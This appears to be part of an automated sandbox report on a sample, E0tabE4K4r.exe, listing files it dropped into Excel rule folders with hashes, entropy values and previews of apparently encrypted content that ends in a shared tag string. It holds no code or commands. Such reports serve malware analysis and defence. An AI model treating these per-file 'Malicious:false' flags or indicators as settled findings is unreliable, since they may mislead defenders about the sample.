                                                                                                                                                  Entropy (8bit):7.825935820456252
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:oENbsBE0S0p6eMFDOtHI6qp1ufLGClA0bcW78dMd4FFnl2bD:Zb90pRPqp1UYe78Sd4iD
                                                                                                                                                  MD5:3DA03D7DD33B0ECCDC9000B5009BC1FC
                                                                                                                                                  SHA1:B69C643A85DAE7D975B3B9E8E21D9B961BED18F6
                                                                                                                                                  SHA-256:DFAABE864794C0B7B484EB39D6AA9CF1F33A559142DE0C1197E22F80F062CF9E
                                                                                                                                                  SHA-512:E8A8C987EFB1972156FF5EA459BD907768E7E7720DA65F4374F226BAD1362187C34B4F2010489875A11AC30474F293B75351BB234DFAF633BA6385ED139994D7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....8........k7.c..;...e'.3......J.m...M...>.r...x]O..nm,..`.v B>..{Ja.U.Uv.........bzC...o,.S.6NB....nK....4{.IE......:.%.t;~.).]Q..U.}].i.a 5ZN...t...^Am..Xy..9.r...4.V)......u.....j..#.........X..].....z.f.,.G1.c..)!C4..:v}..U,.%.Xc4e....]..6..!.Ay...:(N.Hy]d...tI..aI....=.t.{O.C......4..I&.SW6....*y....ll..Q4KY.....>...>Bl}.#p.&.^r....9..&.w....i.'t.cU.../.....e.....k......m....'.a.. =.b........wS...V...1t...b.......+g...n.oN.H...\..I.u.N_rO:....Q..E,P$.q.....\.....kJC.s.t!j+....$z..mR..0c.A..!.......I... @..2......Q.V....q....O4BO....cT.=R.:5.*^ g.!.6i.:......s\.;.y.../.{Ii'y.8..CZ$.U...I..........|.P..[U.w>.|......~..!..A......r..a.....i^.u.*.n..M.K4.....&{..C...<;.Zh&2.L.^Y6O..-........3.b.G hS.U.W.3.........g..1..d...l......E.......{wy...G.....8..WS.,....@.Z.7..[U.%d2..%..`.<F9..~4T..n@.......U...a..b.c.z9D..G.b...$X,_/c.?$g..z..Q.v....Lpd{.EZ...0..0JbG.Z.*n.z..Q0....W.<..e..A~.>.C......n.f..n?...G..1.,.rH..A3i..'.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170037v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1503
                                                                                                                                                  Entropy (8bit):7.8538510305582765
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:DvX0ud3i+KLCKvvSFUB0emjSUAKV5B1LD9wejZO/VHHfUEi8lF5P6SFnLtyyp2bD:DvE0TEMUscKN11welO9fTi8lrFnJ5CD
                                                                                                                                                  MD5:1E07918B8D41016E30AE68848933CD12
                                                                                                                                                  SHA1:06B6FCEC6E3836B001428F750D59BA7084083BE4
                                                                                                                                                  SHA-256:CE93A742D97425C667D4F328B3277E31BC7306A3575E14A397A01E9BFE11252A
                                                                                                                                                  SHA-512:70DA0913426668B69C969ED0124B9B365AD974A8A7A7A7FA4E7A2C4D3D5C29A2D05C525EDEC0D8BDAFA5FA75BDD86C54A70B6AC8F93CA94906D53C00AB8C9D0F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.'....`..[..zO.{^.<.e...6.........B5fMd...._.(.A.q..}Wr...H.....w.e.../.....`XI.g)9.j...V\....+9fd<....y....s......<d..^...B....m9.......yS_....I.......d.?.2..S..wo.k..>..#..........j..........H...=.'..4..,)Y.u.b..i.).'0Z9^;.;r.)J.?.k.%....[.....(.m.C.=/...4..n.i.......!O..I:...,........^.2'lpY....uU0.M...kt..g..a.....X6....R....L..|T.....6w...p...).....E.s..p."..2...l.-.i.,.7$6R.w..+....j...n-nO.j.W.Fb)4..*~<..z9b.Aoh..m..I..................BQ...3....b.i..J......'..2.B.*.Nr......y....PZU^`..-+.Uj.vs /......?.f.375...Q..X.d.kO...d.2..^..QZ.%.3.Y.[D.d-.Y........cL$r.4..F.*.c..-..i.P.jT#u..e.QhN..v.qN,.0..\md.'.X.u.\.F_sI.....l...zT...>...Q.Q...K.!.3^W.~..2..&.r...5..\.f..x<J.w.=......_...].....G..Vw2.!T6.q(xpY.......i.....:....\...m,..F],N.M.o.f..c....i/......Aq.{;.{...x..&.[.......$.-.n=/.bgs.MS.e..2R..b.p..m..Z...a...?....4..<QzBEt.M.....io...\....)j.J........n..#."e/k[.l...*;..!q..tVq....+.0.....A6.6._UX6*..u>.BY..\.L.!..W...2.$.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170038v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1036
                                                                                                                                                  Entropy (8bit):7.79049485733273
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:B464dl9WCHaW5yP7MJXy3Li+GPc2eS9LjAMYBcUgNSx5lyYpwsIACkau/TKIPGXB:z4n9WC94MJj+SpcoOzASCQWIOrzp42bD
                                                                                                                                                  MD5:C0E0C914FB9FFC822ACA1EAEF7ABE65D
                                                                                                                                                  SHA1:64E7DA13D5BA7348D7C6FAE7DB7C48724AE77B79
                                                                                                                                                  SHA-256:F22247ADCEED46F58F825A2B5F52111193FADFD7B1A7E4F32F0E55277F112C68
                                                                                                                                                  SHA-512:F5B0707EC5102A07F0426D6757E9B2EA7D88241A0131732FF7B1598AD5F5D5AF600CB75241C3EBB1D42413E7DB9B8F63BD20FE10EDED0278DAB3870D2BB0EEA2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.B..1yj`.g.fz.....C...-.Bm..&.'2t.......e..>..n...[..Vl..E._......s..8@....}.4.l.l.$....`.!.....:P.x.....dL.HU...._tkv....=...N[N......|.GCI.}.t..R6..z '...v.wm..H.V....\.J.'0.{UO..v.>?...}/...........NZ..+.....f..*.......@HK......-E9.D...g..)....zX.D......~..kk.ZN*..'ym...vI~...S4..$$q...^h|!$...lN.!..]....n.Y.@;:s.........fUw...m.......1..c...>....|..f.F...q]..0..azZ.................i.R.v...B..(Y.....IEg.X'..Y..Pt.......H.b....C&...maa....].../...j..>...e..$ .....{.....bF..y5.@=..1.....c....-...s.N..S..kj:W....)4....2.......%.s.$>......16.n"...Km@.L....w...........MQ.i.(.ab._...[.....C.p.t@..Y..aE$.NgT.]...E).U...../.j3........QQoYi..=.tC.T9b....8l9.Bd5....a.u<.fq...>....)...&.._]].:b.6Mz......O......Z=..(.~'Y....c5d.....).F...k.BO...........m..<....,.$$.8#.X.]Ra...2......TA..D...E%I.....J..M.|.t.....^.M.../I...w.n.2......M.A.|......^....aG...K.z\...~.KP.e..?..{..y..a............T.D)W^mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{3

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170039v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):934
                                                                                                                                                  Entropy (8bit):7.782717866168395
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:MY/gScDFuOpQnTLFUzyuY981s5cUSFW7PPHCIM2bD:MYM5uO+PQRs5rSMPq6D
                                                                                                                                                  MD5:EA5DAD46510448195E8320E5DAE2D39B
                                                                                                                                                  SHA1:78CA098BD70AC318A94ECEA672471778419F3383
                                                                                                                                                  SHA-256:2FFC2B52E09A967DB5A1A8471D46963A4B0616A73B8B76B168563809AA95DCCA
                                                                                                                                                  SHA-512:1EB1D8C4DB5ECF8758F7D3E9B8AD41D64A7007CAC1FB2CB61A8A71677E2465B8A82DC01D1EDDA83AD209AEE74FD1D98A6765B2DAF536B286DB65890A0554870A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml. ...Za".)..%..*K..>....7......_t#...t..x1B?KS...>.....^j..L.q,%....?...y..u.W....P%.KG*uV......h*.).h.Fh#..l...$.g.......86.#..-#./K..?2.W.a...f.3f.K.(AAT.....|.~@...m...A7..0zV..>.......-.&....2Z..'.F..t}..?...9.1..#*v5.VLI.V.....[f.3Z...E.d.4..L.$ZS..s.%....b&.E......f.....I*hT.....u+..Cb.....3.Co...a..a.eit..F.B....M..s;;.3.)...4@f.....y...*..k`.F....l.f..G..Z......px.....Xv...H.j...V.m+....3....C...t..a....>8........`B.w.r..EZ.....k.>.G...|S..;....+....B]6...cx..3.pV.$6T..A.Gl9...d.0....9.b.]Q#.&.@,W.....Z....GI.7..........2..........;.e...$..n.3.z......u....i...4.&..|L~.....B....Fe......T/l...C....!.h].".y.T.-...pr.~<....7....;#r....q]N..f.'G@... ...q(\.9l. .pKP;X|.5......GCr2.....0.J...}$$..n..{.....6..0).:S....[.+.J.`......H..Kz....b...9...r/..\:..c....)..-..6Hs,.I4/..Z.....`...b..{....].:a..pS.%mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170040v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):723
                                                                                                                                                  Entropy (8bit):7.710095275518593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:xcMFKJ6oIJU0hoiQ5qpSUEmaKE/UAXy9cCpQOObae2gFvwdA1xRKqxPme9aSUdNX:xcMkIoIJU0hoiQ5qIdtKE/Y0hbae2g6b
                                                                                                                                                  MD5:E2B49758595E07005A5D998437CA3B4B
                                                                                                                                                  SHA1:FDF54951C6393EED3CECF0E7BEACA9592CBDF275
                                                                                                                                                  SHA-256:C3C8D13556ADBEA07D00F150D758B67111E9F24789BC4A25AA18AEB45E6DAEA7
                                                                                                                                                  SHA-512:940BD54F1B1E85E04F581E55C23A076C9E51069E2CBE1420E0FB995298566FB56A5BC117FE77247F415A9CDE408FF60EEEA794C8772A3BB9F6395A0F6FC11CB2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmllh...h{...d...:...A<.K._.X.V.'%.(ao.T..3.x.s...#....=.[[@2JC9.....,*...\5....)..)..U*.1...[W.%Z!%...VGF.#`I......._.s.`.M}l.:.....q..wi?^Y.....V.....:9....6fHp.3)v...J.l../..;.5.$`...4..}....e;H.T.C...n...!.....\.]..n..f.C.z.;.ky._...kU.g...<__......>....w4..s..R.S...R.^.u.\..K.....@...>.VBtL....Rv.......{.oh,.....1.U.w. .....k6O.y.v...3.......Z..A.nc../B..9Z.f<.c..\zk...K.5.....|..r.....65R.Kf.....|.6.'h.@...8/1.Q..8..*./t.....*.e..Ci.......H...if.BzS..u..h..RL.d.A.[.O.(Y..H...v...S.~.e\...6..(.....8.d.c..m\.............5....G......Kb2....K..s..o.s.}$......>....q.....@l.....o./..dx..vp..*..X.VM..<.*mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170041v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1089
                                                                                                                                                  Entropy (8bit):7.787436855229349
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:A614su9eGskVj4Iq92PCCi3UCuyZHUNv22sw+XiKX8t2KYhjZp06P2bD:XkVM9qCCL8qv1YKyjE6sD
                                                                                                                                                  MD5:066638A19E68AA2DE999032DB7BEC546
                                                                                                                                                  SHA1:B574C001E9F38D877D2CC8E845E1F5D18728F42D
                                                                                                                                                  SHA-256:A7652434D246D73D980BDD1BE0168E855C19C70D07D1BD0059E41A225B165920
                                                                                                                                                  SHA-512:6E37519390614B4B008149B53171BA341C4F5AF907A3A5C579DDEDBFDA12A508F4E5DB35BA11C5E4B76937157E336491B11C6799BBA7E6F6992DD9311E56833B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmllq.5.....W.]Z.......!.M".&.t%(y.../........Wj....{..olK.:D!.t!.'..f9...{..f..U...t.&.._...|Lu....i.)..{T...;$Bg.B......R.u...BNU:..g...i.R..~.....?.<=.(A.%..l........D...m.oU.......q.#...:....m..=7...<..]..x.0u.V[...a..o.g....*..].-..$[..5.......[.B.....`D.L/9.P.-.-\....q..r....r.4.r=.......A..|.M.-X...3....A.[..F../:...r.....,.!...T.i<zZ.....x.+......8...x...f..uV.Y'...22...n.Z..kJB..b...{=.<.0E..A.W2....`.....j....>[u.5Iyv~...V.x..I.nu'....c...5..(.`*..`.G.c.v......h#.A.\.tQ..V.....?f...l5..W.1.fy.X..r....D:.......U.X...S...Q.,r..g...*.Ep5?E.....wk.Ju.....uU.....]..2.,m..@..K..j/[...R......x.p......)..F.:....Q`A.............L.`t.t...4.Q.b.`,1....4^f=.4...]j..TX7Kz..'.^..[XD.....'..E]..I..7..d:.......~.F.;c.%z%.3..$~......>ue.z.....E>..%.T..QQ.<.......4...9..}...+.....35'..lH.Y...#.S.HV..,..}.Nsm._..kH.O..R...L.]Q...-...l:.......j.f.;y.>..T..h.r.J......1..teC.,....T.#.t..#I.J..rS.?....`...2.....B.k0c{B.5...!........UO..! .....U..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170042v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1049
                                                                                                                                                  Entropy (8bit):7.8213209225497735
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:HLIi4sftgzORkiFbA2qe03PdiJWfEAENBD19lSWm2bD:rIoHRkyA2qeKiJWjA79/D
                                                                                                                                                  MD5:D32CB4B39C8C34BB95F574C825E13F10
                                                                                                                                                  SHA1:329E727DBC195C0BE32EEE6FA10BC6A962379BB9
                                                                                                                                                  SHA-256:060D9005998043D852AB163D3DD1847F9B2666CE05B6D0AAC999FAC5339E4335
                                                                                                                                                  SHA-512:AB74A6DAC2CC720509B334DF57994248004598A43A841B9943F347BFF66366F12F3F5A757692AA20FDA3CB18164EC152965E90EABA25ADA593FD25414389C04B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlA\?Ly..U.T.{/`.!P3.2*......1p.;....z~/..."........|..;-..F..)_.u.x..Q.....|.f.%XK.v......*j....S...u...O..+.:L.%.d.K{.Iu.UM.BMz......7..+.....;...."q..JTb..EE.,..2.g....p.....a/[.z+....kQ.b.VEm..X....... ....b...i4..5.PC...4......u.^..WZ.lO.:.}.MG_.s.R....f.2..I...hf..w...u...Y... ...[j.i.!2...$.&..L."#&x..p...D.D>.{...M...6Nb......^......v....qA...?...0.nN...Tpe8r..8b.G..h9.#G...m.....1ne.u.?o.#.ps...]..lq;.k....T.....C6.[..xn4..5...A...-..2...M...........%..[..S.cm....Y.'N.4n.vXk.l...j.o.z...Fb<.7...~]_s..ArB}.....].b.......]..Ws.#....#2..t.2.......~......c...[.*.$.kPi. .`^............[.....$....aj3.'..N.=.K...^...pE.ts....\.y.l.B...`..Gfl..8.,.......V.]a]..\LO%c.J....u......B)....._.L...6t......K..W.@.I.s.E.X...4......N.EvP.%k...JN....y...$.S.B&U....y....A.-.d...(.f.'....^.......rm.V......R.n.C'. g_Glu[.O.).{...../68..]#.>...'o..|21}.p...Zk....{>........G..I[.....{.S...<lW.'.f.%L..-..j .dh.^mMsRxMUuXypapZbGOAfxD9pczHmW8

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170043v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):807
                                                                                                                                                  Entropy (8bit):7.77410194740854
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:szUsnbFhsX0cVgY1ZxTxByi4yUjspi5yV2bD:5ubcVgAz2iWspeyuD
                                                                                                                                                  MD5:C4FFF67D36F3E8A0EDFDC575257F841F
                                                                                                                                                  SHA1:55329E20B3BAAF844A00132DF3061731036105F7
                                                                                                                                                  SHA-256:D6F91AD0EF9DBCAFFF0A5FF5D0553D18FDADBE3B4AD4B877C9E6349EDCF70C23
                                                                                                                                                  SHA-512:3230699889A18803D29F500F24116288B7D4AC7094179A6CEF63AC8E6A3A1576AFDED3646EBA13C761B840E49F8BBA412ED11AFE5756E24423FA9A96AE383358
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...`....:.:.pB..L8...!.......X.4(P.B.Z..&.+r.)?...x:aZ.k....~}.U.s....Y.Fj....O.0......d.4/..^[eGh|.S.m._..N..(..E.$.36.zeF...q....t.T.Q#>....Nd..a.H>.j.....S...z....J.O....`..Z....m..z@.;.H...t.|.L..,...6..Avz..=._..?.E.8j.H.b./.&..@y.kR....0.X.SG.3...s|..E...+&.X.....SJ...p.....).r..d.k..|e..@K[../.VMCS.....P.g.RF...:..<s:D. ....`.1."....b.1.'.$.A....>..j..o...A|.8KY.....S.o.&.SB.fc6&...(.M.o....W.....v5Pq\.?...22.3...e..C.r.....b..g).JM...G.T...u.......4K2.YM.M.1E.A.]....J..,.u...%.7.E.<.V...}..j*#.<.cF..............xs(...4 #.(......Dv......=@~...t.. .....?h.Cnl...V....iy.T.'.1...O.....D.....0e......B.|.u3...h.D..H.6.C...x.......gK....+v.O....W......\51............mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170044v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):853
                                                                                                                                                  Entropy (8bit):7.756558881405688
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:+n+JsgpUPCkeAmKNoJW5hf54jEFXCZ1pEm5u5eW+ToffMd5dMStP2dGmJkSUdNcq:++jkygzUkCZ1pEm5g+gR2bD
                                                                                                                                                  MD5:6DF5BD3B8D529196D8166B206224BED9
                                                                                                                                                  SHA1:1B3F29F678E4D2987C3B781FC0FB6FB00EAE2C77
                                                                                                                                                  SHA-256:89059D425AB33938020731FE9975BC7E2C5C5F95EF17DAAD7991D953B742B74E
                                                                                                                                                  SHA-512:53AC06BE6FAE6BF9BD6FB61E3AB2210752131EEAEB524A2D30A27DC658A3F8F7AD9675CF15CF45F2BA16B50206E5F4D5FC0EAEB2C244DACB4F304E332CC3FC38
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..<..p.c.*<.r.v...._E[P... F.J..||1...x.o._...FWg..7.pk..............z..$...-....q?...+.y..p'....htp..$..c..,.U..+0......j...:3.~q...`:..w^.J...\...(..R...0G.........l..k......x...=..No.XD..K....@.3TK..b..^...sh.1.d`.B.L.8.K.1.....^..|G...=. 9.Fc.V.DF.k.S..IWs.F.......Fm:...."..O.. .0/..C.B..y..V6#..'.....m....O.g...1..L.Y..b,.<.5.......j.bi.M..I..\%..k^.x..e..s:..)..a....4.SO.r#.D].'.=$+._.qQ4....@......^.:.>.d.w.k.2..nr.u.q.Y.+.e..H.+........q...$..^..m._.......g.Z...dx.o.......dN.......:....f....5.CW..t..7..S.....z.@.o@'"..RX..'.Y.j.la.nVx..3n.....m......Z@..B.r....e...{ A.S.5..#s...!..i..&......qmx|.O....L......"...V...n..WF.....)..9#k?.J....6:......@.}bzO..nnM_..=..K....s....'3..j...-..p....._...Yd..*.....H.....d..=mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170048v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):912
                                                                                                                                                  Entropy (8bit):7.781442916586881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:hLxxS21/2k6HWs7f22Bx9e7gLcvAKJa5RkkwN2bD:hLxxSo/kHxFx9NOAQa5ekbD
                                                                                                                                                  MD5:C952D2E92BC0A990CD42E57EC8AD6D03
                                                                                                                                                  SHA1:D8489888CE61E8F5A604C603B6913045F654CC73
                                                                                                                                                  SHA-256:D5F20F5552FE5173E60D3F97F516B82C587A0F63B48F8BD5DEE55DF9566C5594
                                                                                                                                                  SHA-512:8750CF168A7C5DC605379CF5110E6D9DF9CAFE4D476EA4E52B69B170113D25674CCB3A8431533234022EC823248CCA91766EAB81552A1D1F57D8D4019CE66CD0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..Xy~....\f..a.....Q^...F.e.p.................. ...AN...|<<. 6.C.fP%...1'.....KT..k......H..^......yHf{Z/....~..^....Q..N.:2&Uh..mqg....vX...a.D....H...`S^..,CP..../6..z.........N.O.|.>l.N.a.CR."8 T7.ROP.G.......B:.|&..=.5.2W\.JO...sl.Z..,5.,...L..P.WmC........een.. +.....F.7......)/K..{..Z....P.9).)H;..z..>h....+./.i(u+i,.].....&..:..-..c.~..Au.....p..7...g.I.xK.m......f>2..J*H....UR.PC....$.PE..3...".Q.V...r.7.g.hx.{.&L.fx..0..........$...ZjP~...jzg25+)..).0,..<...F..........#...)M..jN...1 ..[..\....H../.W.~DS.W.....i-i....}...6.*.JsSg...`...B.....h.........\..%d.}..`A..g;+..h...Q..$>cjG@Ag...l4.}r....:..~....2u.....Q....k....%<..b.<.o......j.*.Oz'..G8.x9..8'.$..0.d/..)...+..[..u....c+G.C.m.vF..?.*..3.....T!..fX..N....YU.K.6.r......'~I..?....m.[_...yp..2...P..C..@..;!|.I.br.RemMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170050v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3310
                                                                                                                                                  Entropy (8bit):7.941408846374557
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:p0FLAjrpX3jCKALEgj8w6uIpJxAEhKErAk:tjCK788w6uIppKEj
                                                                                                                                                  MD5:573CA31E2F31E65A2EC39A15F80B143D
                                                                                                                                                  SHA1:C31A29654B493F6AA3F151DE692122C185197C71
                                                                                                                                                  SHA-256:05903D08A60C09E1A415D0CC4068DCF7579CC223E423592E806B345EC31269CD
                                                                                                                                                  SHA-512:011648619202F6A3E4A29C187A84A088BAAB21E10383A1069554A88D5D1BD07FA579947C12C0C64E41970ECEEE888AA7D1C5EBABB177EEEC882DAA60012EAFE2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....?.#.i.....i.6T1.p....]..m ...>...55j..%y.:.$.,.o4.....Y.Tve.......H..m9.=.{.be.i.......f.7.E.x.d.IQ...:..FFM.+...gI.4..T.l.U.mA(...O..-E.R..NM.Y.K.C..J[.\b.B.U.`......Y.T.w:.. .u...o.$.3hS.c.l.....V.....n......f(1..I|..i.:N..y........z2...'$....%9'.Q'.8..k..`$W.,...^....."...._...|V.HO.l%.LW.....]fN.'....:.Q.._Q.XE.^..u.l.m.. .....l....w.T;iK*..[4......F..v..(....{.l..[.2;...........|.!.Ij.j..%(.-Gu."...1.:...._.}...o...........m..n..h*.)..H...%.kF%o....<.7..YZ..&X..$...|.W,..~...)0m6LI..h....S.&I...<..I....I..HoX.}......~.3-...Hz....V*C.....v.g6oJ9.p...~o|A.y....j...{7......s.....n..y...br......{......=`0Ijk........|...&....a...l7..4......$...]....lu.7.....\._(.'......v ..m....H.@.c_....g.... 7......Q.....{C...a*...Z.!3C=..C1.\Nv2..(..&#n..kBSZ\7.hZ..;?...L.Y)}j.."Fc..@.E{...5.JW.....g.`.!.Q.G..-8Jy..w..-....5.$.....o|......w(.......3e...qM.....J.-......^.y.T.Eg..G.2 Bq...J..av..q..].e..0G.gs>w......Jv`...v.c...^sw.-.$.s..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170051v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):910
                                                                                                                                                  Entropy (8bit):7.7743452131844295
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:RPIV6KZU0XJjdPFxrkDTDGgL+YkUOe+RV2bD:RPOSejdtxrkDmn5RuD
                                                                                                                                                  MD5:0611878ED2C7D0E2A77B02AF39B2FC8B
                                                                                                                                                  SHA1:3D504A87733ABA3D45881C16D851861078E694F8
                                                                                                                                                  SHA-256:B1E1739470F9C2F00739B106F31CE824DDECC50665104EE6104CB1BCF19B0F3D
                                                                                                                                                  SHA-512:3CBE4EB6C3353E8E5AD97D2BED30275ED35A8BC25F8ECA6E253B7554C269ABB2B842DC445124F2367F18252BC1374BA5AF7269BD5DC1063DF300CA6D57763333
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlZ....)....j.0.|4.9..&M.%%.R..kQ.LM6KN.yI..d..bZ..gRD...e,..(...0..!qK.Y(..A..ty......."..LHL.gx..0...|.O..Q........[......U/...@x/.....J_t..p...^...\...0t..L....+S...#..Togz.}R.Eo....9K.e..... $U...T.2.i....S..P.q.....]..z}..E/t......A.T.I.`.....i......o..o....|....#CW...............<...6x..........b..b.AF..T.*8..[V.pUC.....^..B./.k....&.$..O.o..t4A...A.c9.D.ZR.............s..z.....@..R..o^..5.WX...71..........g.X..].W.}s..........:..].1.....O..#.Zt.>F..t.9..9..=.E..[.+.=H...c^c%.ll..;.d..A.]x..z.d. J...R..g}..:.:.]2.t....z.>.o.i..DiO.BB...=..:.,..*E..YZ./.XG...,.ZM..w....{v.:y....s.C.|.#.....c-.W..G...`[r@:.^^.f..y..1.X..........'8.f.W..iY.y.;.E.q'..\....{.0.kE.......J....'..+4T....w.....\..o.o..Q&....3.nj....<............:y.......y.:.._F........t...26..-......0`.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170052v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):941
                                                                                                                                                  Entropy (8bit):7.787756058439385
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:oEmGEnJgdp3nWapr5xY5IG2oOqPaZKZTb2bD:nM+D/Y5VJX2D
                                                                                                                                                  MD5:496DAB3B10FF0CF89F89F9CAEB41DB62
                                                                                                                                                  SHA1:5E8FD495D838B6482B2C191A6CA6B95F32CDE81F
                                                                                                                                                  SHA-256:62197E6965ED81E625804C096BC408BB2B871A1CC20DEBE938433997E9EB51E7
                                                                                                                                                  SHA-512:AD2B9ED401F174301F44CC919DA0F7851E67CA25F70B509D077DA84080093A3C5E71372760FD0A5B57130F33434A8B625EBE060A1453453520C0BB011FAC5A1C
                                                                                                                                                  Malicious:false
